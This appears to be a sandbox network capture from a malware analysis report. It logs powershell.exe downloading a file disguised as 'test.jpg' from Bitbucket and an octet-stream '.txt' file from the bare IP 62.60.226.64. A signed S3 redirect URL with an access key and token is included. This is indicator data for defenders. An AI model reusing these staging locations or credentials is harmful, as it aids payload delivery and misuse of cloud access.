Jan 20, 2025 15:49:17.695430040 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695445061 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695457935 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.695461988 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695478916 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695482016 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.695496082 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695512056 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695518017 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.695528984 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695549011 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.695554018 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695569992 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695585966 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695600986 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695605993 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.695616961 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695627928 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.695631981 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695655107 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695662022 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.695673943 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695698023 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695698977 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.695714951 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695729017 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695736885 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.695748091 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695763111 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695777893 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695780993 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.695801020 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695804119 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.695816994 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695832014 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695838928 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.695847988 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695863008 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695864916 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.695909977 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.697565079 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.697597027 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.697623968 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.697633982 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.697639942 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.697657108 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.697746038 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.697841883 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.697859049 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.697875023 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.697884083 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.697890997 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.697909117 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.697911978 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.697925091 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.697956085 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.697958946 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.697974920 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.697990894 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.698005915 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.698015928 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.698023081 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.698031902 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.698041916 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.698056936 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.698062897 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.698072910 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.698087931 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.698103905 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.698107004 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.698136091 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702183008 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702199936 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702217102 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702231884 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702239037 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702248096 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702263117 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702279091 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702279091 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702292919 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702297926 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702308893 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702313900 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702323914 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702338934 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702349901 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702366114 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702382088 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702383995 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702397108 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702413082 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702418089 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702430964 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702444077 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702445984 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702470064 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702485085 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702502966 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702503920 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702528954 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702529907 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702543974 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702558994 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702574015 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702574968 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702589989 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702599049 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702605009 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702620029 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702632904 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702635050 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702660084 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702666044 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702688932 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702707052 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702722073 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702737093 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702750921 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702756882 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702768087 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702783108 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702785015 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702800035 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702816010 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702827930 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702831030 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702852964 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702853918 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702869892 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702884912 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702898026 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702899933 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702915907 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702918053 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702933073 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702950001 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702965975 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702965975 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702981949 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.702985048 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.702997923 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.703013897 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.703026056 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.703028917 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.703048944 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.703049898 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.703067064 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.703083992 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.703088999 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.703099012 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.703115940 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.703191996 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.703207970 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.703222990 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.703238010 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.703241110 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.703255892 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.703267097 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.703273058 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.703289032 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.703303099 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.703466892 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.783713102 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.783873081 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.783898115 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.783914089 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.783931017 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.783936024 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.783946991 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.783962011 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.783968925 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.783977985 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.783983946 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.783992052 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784006119 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784015894 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.784019947 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784034967 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784044027 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.784064054 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784079075 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.784095049 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784110069 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784135103 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784149885 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.784149885 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784164906 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784169912 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.784188986 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784200907 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.784203053 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784225941 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784240007 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.784240961 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784256935 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784269094 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784284115 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784291983 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.784300089 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784316063 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784318924 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.784332037 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784343958 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.784346104 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784360886 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784367085 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.784377098 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.784416914 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.785924911 CET  80           49739      62.60.226.64   192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.785938025 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.785960913 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.785976887 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.785978079 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.785990000 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786000967 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.786004066 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786030054 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786030054 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.786046982 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786062956 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786063910 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.786086082 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786101103 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786112070 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.786113977 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786128044 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786137104 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.786143064 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786159039 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786161900 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.786176920 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786190033 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786192894 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.786206961 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786242008 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.789371014 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789387941 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789407969 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.789412022 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789427042 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789443016 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789446115 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.789475918 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.789520979 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789536953 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789551973 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789566040 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789576054 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.789582968 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789599895 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789608955 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.789614916 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789634943 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.832881927 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.961957932 CET4973980192.168.2.462.60.226.64
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jan 20, 2025 15:49:10.541661978 CET  53434        53         192.168.2.4  1.1.1.1
Jan 20, 2025 15:49:10.548773050 CET  53           53434      1.1.1.1      192.168.2.4
Jan 20, 2025 15:49:11.776865959 CET  52392        53         192.168.2.4  1.1.1.1
Jan 20, 2025 15:49:11.801826000 CET  53           52392      1.1.1.1      192.168.2.4

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                            Type            Class        DNS over HTTPS
Jan 20, 2025 15:49:10.541661978 CET  192.168.2.4  1.1.1.1  0x5d65    Standard query (0)  bitbucket.org                   A (IP address)  IN (0x0001)  false
Jan 20, 2025 15:49:11.776865959 CET  192.168.2.4  1.1.1.1  0x3801    Standard query (0)  bbuseruploads.s3.amazonaws.com  A (IP address)  IN (0x0001)  false

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                            CName                         Address         Type                    Class        DNS over HTTPS
Jan 20, 2025 15:49:10.548773050 CET  1.1.1.1    192.168.2.4  0x5d65    No error (0)  bitbucket.org                   -                             185.166.143.48  A (IP address)          IN (0x0001)  false
Jan 20, 2025 15:49:10.548773050 CET  1.1.1.1    192.168.2.4  0x5d65    No error (0)  bitbucket.org                   -                             185.166.143.49  A (IP address)          IN (0x0001)  false
Jan 20, 2025 15:49:10.548773050 CET  1.1.1.1    192.168.2.4  0x5d65    No error (0)  bitbucket.org                   -                             185.166.143.50  A (IP address)          IN (0x0001)  false
Jan 20, 2025 15:49:11.801826000 CET  1.1.1.1    192.168.2.4  0x3801    No error (0)  bbuseruploads.s3.amazonaws.com  s3-1-w.amazonaws.com          -               CNAME (Canonical name)  IN (0x0001)  false
Jan 20, 2025 15:49:11.801826000 CET  1.1.1.1    192.168.2.4  0x3801    No error (0)  s3-1-w.amazonaws.com            s3-w.us-east-1.amazonaws.com  -               CNAME (Canonical name)  IN (0x0001)  false
Jan 20, 2025 15:49:11.801826000 CET  1.1.1.1    192.168.2.4  0x3801    No error (0)  s3-w.us-east-1.amazonaws.com    -                             54.231.134.241  A (IP address)          IN (0x0001)  false
Jan 20, 2025 15:49:11.801826000 CET  1.1.1.1    192.168.2.4  0x3801    No error (0)  s3-w.us-east-1.amazonaws.com    -                             52.217.129.33   A (IP address)          IN (0x0001)  false
Jan 20, 2025 15:49:11.801826000 CET  1.1.1.1    192.168.2.4  0x3801    No error (0)  s3-w.us-east-1.amazonaws.com    -                             52.216.59.193   A (IP address)          IN (0x0001)  false
Jan 20, 2025 15:49:11.801826000 CET  1.1.1.1    192.168.2.4  0x3801    No error (0)  s3-w.us-east-1.amazonaws.com    -                             54.231.194.161  A (IP address)          IN (0x0001)  false
Jan 20, 2025 15:49:11.801826000 CET  1.1.1.1    192.168.2.4  0x3801    No error (0)  s3-w.us-east-1.amazonaws.com    -                             3.5.21.114      A (IP address)          IN (0x0001)  false
Jan 20, 2025 15:49:11.801826000 CET  1.1.1.1    192.168.2.4  0x3801    No error (0)  s3-w.us-east-1.amazonaws.com    -                             52.216.26.28    A (IP address)          IN (0x0001)  false
Jan 20, 2025 15:49:11.801826000 CET  1.1.1.1    192.168.2.4  0x3801    No error (0)  s3-w.us-east-1.amazonaws.com    -                             54.231.129.249  A (IP address)          IN (0x0001)  false
Jan 20, 2025 15:49:11.801826000 CET  1.1.1.1    192.168.2.4  0x3801    No error (0)  s3-w.us-east-1.amazonaws.com    -                             54.231.173.1    A (IP address)          IN (0x0001)  false

• bitbucket.org
• bbuseruploads.s3.amazonaws.com
• 62.60.226.64
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49739        62.60.226.64    80                8112  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 20, 2025 15:49:16.523586988 CET  86                 OUT        GET /public_files/kmAFAhc.txt HTTP/1.1
Host: 62.60.226.64
Connection: Keep-Alive
Jan 20, 2025 15:49:17.156408072 CET  1236               IN         HTTP/1.1 200 OK
Date: Mon, 20 Jan 2025 14:49:17 GMT
Server: Apache/2.4.62 (CentOS Stream)
Last-Modified: Mon, 20 Jan 2025 09:52:15 GMT
ETag: "95304-62c203718608d"
Accept-Ranges: bytes
Content-Length: 611076
Content-Disposition: attachment
Content-Type: application/octet-stream
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49737        185.166.143.48  443               8112  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-20 14:49:11 UTC  98                 OUT        GET /dfghd/fgd/downloads/test.jpg?517613 HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
2025-01-20 14:49:11 UTC  5935               IN         HTTP/1.1 302 Found
                                                                                          Date: Mon, 20 Jan 2025 14:49:11 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 0
                                                                                          Server: AtlassianEdge
                                                                                          Location: https://bbuseruploads.s3.amazonaws.com/a613a3a7-960e-457b-ade9-adac2ded05f8/downloads/13e6a3ab-36e2-4926-afc8-122cd28abbda/test.jpg?response-content-disposition=attachment%3B%20filename%3D%22test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNBTKKJY5M&Signature=WrRRG%2FjNv0KYJyVNvKxc%2BY6fR%2B0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEK%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIHqlgISaXQZNWVdHrtqHFQM1aKdCCC5wz47mj8NtMH%2BIAiBdtBjgyJZ6tj7uXWFGVxbXJfoLZTyvi2A7sXwcgSrL%2BSqwAgio%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMFJaKkm%2Baexgdux4uKoQC6KXHopDQ%2FlrvHmoVWqroq7CEf10111jAHgCJB1MtIiwoslQvWwr%2B0TjbV0drvIlTQrZSoCEisB3EKyeKiSOdy4cG7zLV8sUpkCTFObt0YVdcZihx5WCNnElUd6Q0GtOsyOJ54uKNitBk4qLGC%2F8FLxoWB8Zd7GFtIhjBH6oiR29zWtJHxVJMEzbEk0X8I6ra5TJTAxAmj%2FGBrJRWzhpL7djvH%2BWsC9IJL3xndZ130rjzzEn3Hy0dMH4Ffr76tlD%2FuZUeGrYyghPc8SyR5fqjbJHN3e9nSOiKDWOIXmDqOsRdlmX0FjNbG66IlTsda3suu%2BoRn1c7bGtYzOEXJO6jQojgYsEwsMC5vAY6ngHasjGz4hS4AfIgJXweXhdRz1bV7MycPu%2FtoygR37IQAI2SIbv%2BJt7FUa41kbstbCnTf83poZhHfI9%2 [TRUNCATED]
                                                                                          Expires: Mon, 20 Jan 2025 14:49:11 GMT
                                                                                          Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                          X-Used-Mesh: False
                                                                                          Vary: Accept-Language, Origin
                                                                                          Content-Language: en
                                                                                          X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                          X-Dc-Location: Micros-3
                                                                                          X-Served-By: cf1f26f6a395
                                                                                          X-Version: 65107e80b38c
                                                                                          X-Static-Version: 65107e80b38c
                                                                                          X-Request-Count: 3932
